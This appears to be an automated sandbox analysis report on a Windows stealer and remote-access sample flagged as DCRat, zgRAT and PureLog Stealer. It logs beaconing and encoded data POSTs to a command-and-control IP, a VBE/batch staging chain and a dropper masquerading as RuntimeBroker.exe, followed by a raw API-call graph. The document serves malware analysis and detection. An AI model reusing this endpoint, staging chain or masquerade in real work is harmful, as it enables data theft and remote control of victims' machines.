Jan 1, 2025 02:28:52.158937931 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:52.870223999 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:52.877733946 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.4 | 50144 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:53.007575989 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:53.722229004 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:53.730906963 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.4 | 50145 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:53.850507021 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:54.555763006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:54.563678026 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.4 | 50146 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:54.741513014 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:55.459173918 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:55.469841957 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.4 | 50147 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:55.600076914 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:56.310354948 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:56.323918104 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.4 | 50148 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:56.447338104 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:57.177263975 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:57.184277058 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  142 | 192.168.2.4 | 50149 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:57.314255953 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:58.028799057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:29:00.741898060 CET | 2504 | OUT | Data Raw: 56 5e 5e 54 5a 5d 5b 53 5f 5a 5a 53 57 5f 56 5e 5f 54 5d 41 51 50 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^TZ][S_ZZSW_V^_T]AQPWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<25T$\20<[8>)?1*+6"=47'#2Q.]-"^%#[.>
                                                                                                  Jan 1, 2025 02:29:00.973979950 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:57 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Target ID:0
                                                                                                  Start time:20:26:52
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\voed9G7p5s.exe"
                                                                                                  Imagebase:0xe00000
                                                                                                  File size:2'342'562 bytes
                                                                                                  MD5 hash:0E22E05075402FD6FC2F0A833D49C288
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:20:26:53
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe"
                                                                                                  Imagebase:0xf60000
                                                                                                  File size:147'456 bytes
                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                                                                                                  Imagebase:0x240000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:20:27:01
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\savesSession/ComponentBrokermonitor.exe"
                                                                                                  Imagebase:0x980000
                                                                                                  File size:2'751'488 bytes
                                                                                                  MD5 hash:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat"
                                                                                                  Imagebase:0x7ff73f030000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:chcp 65001
                                                                                                  Imagebase:0x7ff6890d0000
                                                                                                  File size:14'848 bytes
                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:20:27:04
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                  Imagebase:0x7ff67d250000
                                                                                                  File size:108'032 bytes
                                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:20:27:09
                                                                                                  Start date:31/12/2024
                                                                                                  Path:C:\Recovery\RuntimeBroker.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                  Imagebase:0x880000
                                                                                                  File size:2'751'488 bytes
                                                                                                  MD5 hash:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10%
                                                                                                    Total number of Nodes:1523
                                                                                                    Total number of Limit Nodes:43
e0b991 51 API calls 3 library calls 23591->23841 23593 e1da5c __EH_prolog 23592->23593 23869 e10659 23593->23869 23595 e1da8d 23873 e05b3d 23595->23873 23597 e1daab 23877 e07b0d 23597->23877 23601 e1dafe 23893 e07b9e 23601->23893 23603 e1bdee 23603->23517 23605 e1d6a8 23604->23605 24414 e1a5c6 23605->24414 23608 e1d6b5 GetWindow 23609 e1d6d5 23608->23609 23610 e1bf15 23608->23610 23609->23610 23611 e1d6e2 GetClassNameW 23609->23611 23613 e1d706 GetWindowLongW 23609->23613 23614 e1d76a GetWindow 23609->23614 23610->23370 23610->23371 24419 e11fbb CompareStringW 23611->24419 23613->23614 23615 e1d716 SendMessageW 23613->23615 23614->23609 23614->23610 23615->23614 23616 e1d72c GetObjectW 23615->23616 24420 e1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23616->24420 23618 e1d743 24421 e1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23618->24421 24422 e1a80c 8 API calls 23618->24422 23621 e1d754 SendMessageW DeleteObject 23621->23614 23622->23386 23624 e1abcc 23623->23624 23629 e1abf1 23623->23629 24425 e11fbb CompareStringW 23624->24425 23626 e1abf6 SHAutoComplete 23627 e1abff 23626->23627 23631 e1b093 23627->23631 23628 e1abdf 23628->23629 23630 e1abe3 FindWindowExW 23628->23630 23629->23626 23629->23627 23630->23629 23632 e1b09d __EH_prolog 23631->23632 23633 e013dc 84 API calls 23632->23633 23634 e1b0bf 23633->23634 24426 e01fdc 23634->24426 23637 e1b0d9 23639 e01692 86 API calls 23637->23639 23638 e1b0eb 23640 e019af 128 API calls 23638->23640 23641 e1b0e4 23639->23641 23643 e1b10d __InternalCxxFrameHandler ___std_exception_copy 23640->23643 23641->23412 23641->23415 23642 e01692 86 API calls 23642->23641 23643->23642 23644->23458 24434 e1b568 PeekMessageW 23645->24434 23648 e1d502 23654 e1d50d ShowWindow SendMessageW SendMessageW 23648->23654 23649 e1d536 SendMessageW SendMessageW 23650 e1d591 SendMessageW SendMessageW SendMessageW 23649->23650 23651 e1d572 23649->23651 23652 e1d5c4 SendMessageW 23650->23652 23653 e1d5e7 SendMessageW 23650->23653 
23651->23650 23652->23653 23653->23419 23654->23649 23655->23474 23656->23502 23657->23507 23658->23511 23659->23516 23660->23383 23661->23453 23662->23475 23663->23445 23664->23435 23665->23531 23666->23529 23668 e0a2bf 23667->23668 23669 e0a2e3 23668->23669 23670 e0a2d6 CreateDirectoryW 23668->23670 23688 e0a231 23669->23688 23670->23669 23672 e0a316 23670->23672 23675 e0a325 23672->23675 23680 e0a4ed 23672->23680 23674 e0a329 GetLastError 23674->23675 23675->23536 23678 e0a2ff 23678->23674 23679 e0a303 CreateDirectoryW 23678->23679 23679->23672 23679->23674 23695 e1ec50 23680->23695 23683 e0a510 23685 e0bb03 GetCurrentDirectoryW 23683->23685 23684 e0a53d 23684->23675 23686 e0a524 23685->23686 23686->23684 23687 e0a528 SetFileAttributesW 23686->23687 23687->23684 23697 e0a243 23688->23697 23691 e0bb03 23692 e0bb10 _wcslen 23691->23692 23693 e0bbb8 GetCurrentDirectoryW 23692->23693 23694 e0bb39 _wcslen 23692->23694 23693->23694 23694->23678 23696 e0a4fa SetFileAttributesW 23695->23696 23696->23683 23696->23684 23698 e1ec50 23697->23698 23699 e0a250 GetFileAttributesW 23698->23699 23700 e0a261 23699->23700 23701 e0a23a 23699->23701 23702 e0bb03 GetCurrentDirectoryW 23700->23702 23701->23674 23701->23691 23703 e0a275 23702->23703 23703->23701 23704 e0a279 GetFileAttributesW 23703->23704 23704->23701 23706 e0407c __vsnwprintf_l 23705->23706 23709 e25fd4 23706->23709 23712 e24097 23709->23712 23713 e240d7 23712->23713 23714 e240bf 23712->23714 23713->23714 23716 e240df 23713->23716 23736 e291a8 20 API calls __dosmaperr 23714->23736 23738 e24636 23716->23738 23718 e240c4 23737 e29087 26 API calls _abort 23718->23737 23723 e24167 23747 e249e6 51 API calls 3 library calls 23723->23747 23724 e04086 23724->23472 23727 e24172 23748 e246b9 20 API calls _free 23727->23748 23728 e240cf 23729 e1fbbc 23728->23729 23730 e1fbc5 IsProcessorFeaturePresent 23729->23730 23731 e1fbc4 23729->23731 23733 e1fc07 23730->23733 23731->23724 23749 e1fbca SetUnhandledExceptionFilter 
UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23733->23749 23735 e1fcea 23735->23724 23736->23718 23737->23728 23739 e24653 23738->23739 23740 e240ef 23738->23740 23739->23740 23750 e297e5 GetLastError 23739->23750 23746 e24601 20 API calls 2 library calls 23740->23746 23742 e24674 23770 e2993a 38 API calls __fassign 23742->23770 23744 e2468d 23771 e29967 38 API calls __fassign 23744->23771 23746->23723 23747->23727 23748->23728 23749->23735 23751 e29801 23750->23751 23752 e297fb 23750->23752 23756 e29850 SetLastError 23751->23756 23773 e2b136 23751->23773 23772 e2ae5b 11 API calls 2 library calls 23752->23772 23756->23742 23757 e2981b 23780 e28dcc 23757->23780 23760 e29830 23760->23757 23762 e29837 23760->23762 23761 e29821 23764 e2985c SetLastError 23761->23764 23787 e29649 20 API calls __dosmaperr 23762->23787 23788 e28d24 38 API calls _abort 23764->23788 23765 e29842 23767 e28dcc _free 20 API calls 23765->23767 23769 e29849 23767->23769 23769->23756 23769->23764 23770->23744 23771->23740 23772->23751 23774 e2b143 __dosmaperr 23773->23774 23775 e2b183 23774->23775 23776 e2b16e RtlAllocateHeap 23774->23776 23789 e27a5e 7 API calls 2 library calls 23774->23789 23790 e291a8 20 API calls __dosmaperr 23775->23790 23776->23774 23778 e29813 23776->23778 23778->23757 23786 e2aeb1 11 API calls 2 library calls 23778->23786 23781 e28dd7 RtlFreeHeap 23780->23781 23782 e28e00 _free 23780->23782 23781->23782 23783 e28dec 23781->23783 23782->23761 23791 e291a8 20 API calls __dosmaperr 23783->23791 23785 e28df2 GetLastError 23785->23782 23786->23760 23787->23765 23789->23774 23790->23778 23791->23785 23793 e09781 23792->23793 23794 e09757 23792->23794 23793->23559 23794->23793 23803 e0a1e0 23794->23803 23798 e0962c 23797->23798 23799 e0964a 23797->23799 23798->23799 23801 e09638 CloseHandle 23798->23801 23800 e09669 23799->23800 23811 e06bd5 76 API calls 23799->23811 23800->23559 23801->23799 23804 e1ec50 23803->23804 23805 e0a1ed DeleteFileW 23804->23805 23806 
e0a200 23805->23806 23807 e0977f 23805->23807 23808 e0bb03 GetCurrentDirectoryW 23806->23808 23807->23559 23809 e0a214 23808->23809 23809->23807 23810 e0a218 DeleteFileW 23809->23810 23810->23807 23811->23800 23818 e0d9b0 23812->23818 23815 e0e645 SetDlgItemTextW 23815->23566 23816 e0e66b LoadStringW 23816->23815 23817 e0e682 LoadStringW 23816->23817 23817->23815 23823 e0d8ec 23818->23823 23820 e0d9cd 23821 e0d9e2 23820->23821 23831 e0d9f0 26 API calls 23820->23831 23821->23815 23821->23816 23824 e0d904 23823->23824 23830 e0d984 _strncpy 23823->23830 23827 e0d928 23824->23827 23832 e11da7 WideCharToMultiByte 23824->23832 23826 e0d959 23834 e26159 26 API calls 3 library calls 23826->23834 23827->23826 23833 e0e5b1 50 API calls __vsnprintf 23827->23833 23830->23820 23831->23821 23832->23827 23833->23826 23834->23830 23836 e1b31e 23835->23836 23837 e1b3f0 ExpandEnvironmentStringsW 23836->23837 23838 e1b40d 23836->23838 23837->23838 23838->23578 23839->23578 23840->23578 23841->23591 23842->23578 23843->23578 23844->23578 23846 e28e54 23845->23846 23847 e28e61 23846->23847 23848 e28e6c 23846->23848 23858 e28e06 23847->23858 23850 e28e74 23848->23850 23856 e28e7d __dosmaperr 23848->23856 23853 e28dcc _free 20 API calls 23850->23853 23851 e28e82 23865 e291a8 20 API calls __dosmaperr 23851->23865 23852 e28ea7 RtlReAllocateHeap 23855 e28e69 23852->23855 23852->23856 23853->23855 23855->23578 23856->23851 23856->23852 23866 e27a5e 7 API calls 2 library calls 23856->23866 23859 e28e44 23858->23859 23863 e28e14 __dosmaperr 23858->23863 23868 e291a8 20 API calls __dosmaperr 23859->23868 23861 e28e2f RtlAllocateHeap 23862 e28e42 23861->23862 23861->23863 23862->23855 23863->23859 23863->23861 23867 e27a5e 7 API calls 2 library calls 23863->23867 23865->23855 23866->23856 23867->23863 23868->23862 23870 e10666 _wcslen 23869->23870 23897 e017e9 23870->23897 23872 e1067e 23872->23595 23874 e10659 _wcslen 23873->23874 23875 e017e9 78 API calls 23874->23875 23876 e1067e 23875->23876 
23876->23597 23878 e07b17 __EH_prolog 23877->23878 23914 e0ce40 23878->23914 23880 e07b32 23920 e1eb38 23880->23920 23882 e07b5c 23929 e14a76 23882->23929 23885 e07c7d 23886 e07c87 23885->23886 23889 e07cf1 23886->23889 23961 e0a56d 23886->23961 23888 e07d50 23891 e07d92 23888->23891 23967 e0138b 74 API calls 23888->23967 23889->23888 23939 e08284 23889->23939 23891->23601 23894 e07bac 23893->23894 23896 e07bb3 23893->23896 23895 e12297 86 API calls 23894->23895 23895->23896 23898 e017ff 23897->23898 23909 e0185a __InternalCxxFrameHandler 23897->23909 23899 e01828 23898->23899 23910 e06c36 76 API calls __vswprintf_c_l 23898->23910 23900 e01887 23899->23900 23906 e01847 ___std_exception_copy 23899->23906 23902 e23e3e 22 API calls 23900->23902 23905 e0188e 23902->23905 23903 e0181e 23911 e06ca7 75 API calls 23903->23911 23905->23909 23913 e06ca7 75 API calls 23905->23913 23906->23909 23912 e06ca7 75 API calls 23906->23912 23909->23872 23910->23903 23911->23899 23912->23909 23913->23909 23915 e0ce4a __EH_prolog 23914->23915 23916 e1eb38 8 API calls 23915->23916 23917 e0ce8d 23916->23917 23918 e1eb38 8 API calls 23917->23918 23919 e0ceb1 23918->23919 23919->23880 23922 e1eb3d ___std_exception_copy 23920->23922 23921 e1eb57 23921->23882 23922->23921 23925 e1eb59 23922->23925 23935 e27a5e 7 API calls 2 library calls 23922->23935 23924 e1f5c9 23937 e2238d RaiseException 23924->23937 23925->23924 23936 e2238d RaiseException 23925->23936 23928 e1f5e6 23930 e14a80 __EH_prolog 23929->23930 23931 e1eb38 8 API calls 23930->23931 23932 e14a9c 23931->23932 23933 e07b8b 23932->23933 23938 e10e46 80 API calls 23932->23938 23933->23885 23935->23922 23936->23924 23937->23928 23938->23933 23940 e0828e __EH_prolog 23939->23940 23968 e013dc 23940->23968 23942 e082aa 23943 e082bb 23942->23943 24111 e09f42 23942->24111 23946 e082f2 23943->23946 23976 e01a04 23943->23976 24107 e01692 23946->24107 23951 e083e8 24003 e01f6d 23951->24003 23955 e083f3 23955->23946 24007 e03b2d 23955->24007 
24019 e0848e 23955->24019 23956 e0a56d 7 API calls 23958 e082ee 23956->23958 23958->23946 23958->23956 23960 e08389 23958->23960 24115 e0c0c5 CompareStringW _wcslen 23958->24115 23995 e08430 23960->23995 23962 e0a582 23961->23962 23966 e0a5b0 23962->23966 24403 e0a69b 23962->24403 23964 e0a592 23965 e0a597 FindClose 23964->23965 23964->23966 23965->23966 23966->23886 23967->23891 23969 e013e1 __EH_prolog 23968->23969 23970 e0ce40 8 API calls 23969->23970 23971 e01419 23970->23971 23972 e1eb38 8 API calls 23971->23972 23975 e01474 __cftof 23971->23975 23973 e01461 23972->23973 23973->23975 24116 e0b505 23973->24116 23975->23942 23977 e01a0e __EH_prolog 23976->23977 23989 e01a61 23977->23989 23992 e01b9b 23977->23992 24132 e013ba 23977->24132 23979 e01bc7 24144 e0138b 74 API calls 23979->24144 23982 e03b2d 101 API calls 23986 e01c12 23982->23986 23983 e01bd4 23983->23982 23983->23992 23984 e01c5a 23988 e01c8d 23984->23988 23984->23992 24145 e0138b 74 API calls 23984->24145 23986->23984 23987 e03b2d 101 API calls 23986->23987 23987->23986 23988->23992 23993 e09e80 79 API calls 23988->23993 23989->23979 23989->23983 23989->23992 23990 e03b2d 101 API calls 23991 e01cde 23990->23991 23991->23990 23991->23992 23992->23958 23993->23991 24165 e0cf3d 23995->24165 23997 e08440 24169 e113d2 GetSystemTime SystemTimeToFileTime 23997->24169 23999 e083a3 23999->23951 24000 e11b66 23999->24000 24174 e1de6b 24000->24174 24004 e01f72 __EH_prolog 24003->24004 24006 e01fa6 24004->24006 24182 e019af 24004->24182 24006->23955 24008 e03b39 24007->24008 24009 e03b3d 24007->24009 24008->23955 24018 e09e80 79 API calls 24009->24018 24010 e03b4f 24011 e03b78 24010->24011 24012 e03b6a 24010->24012 24338 e0286b 101 API calls 3 library calls 24011->24338 24013 e03baa 24012->24013 24337 e032f7 89 API calls 2 library calls 24012->24337 24013->23955 24016 e03b76 24016->24013 24339 e020d7 74 API calls 24016->24339 24018->24010 24020 e08498 __EH_prolog 24019->24020 24025 e084d5 24020->24025 24030 
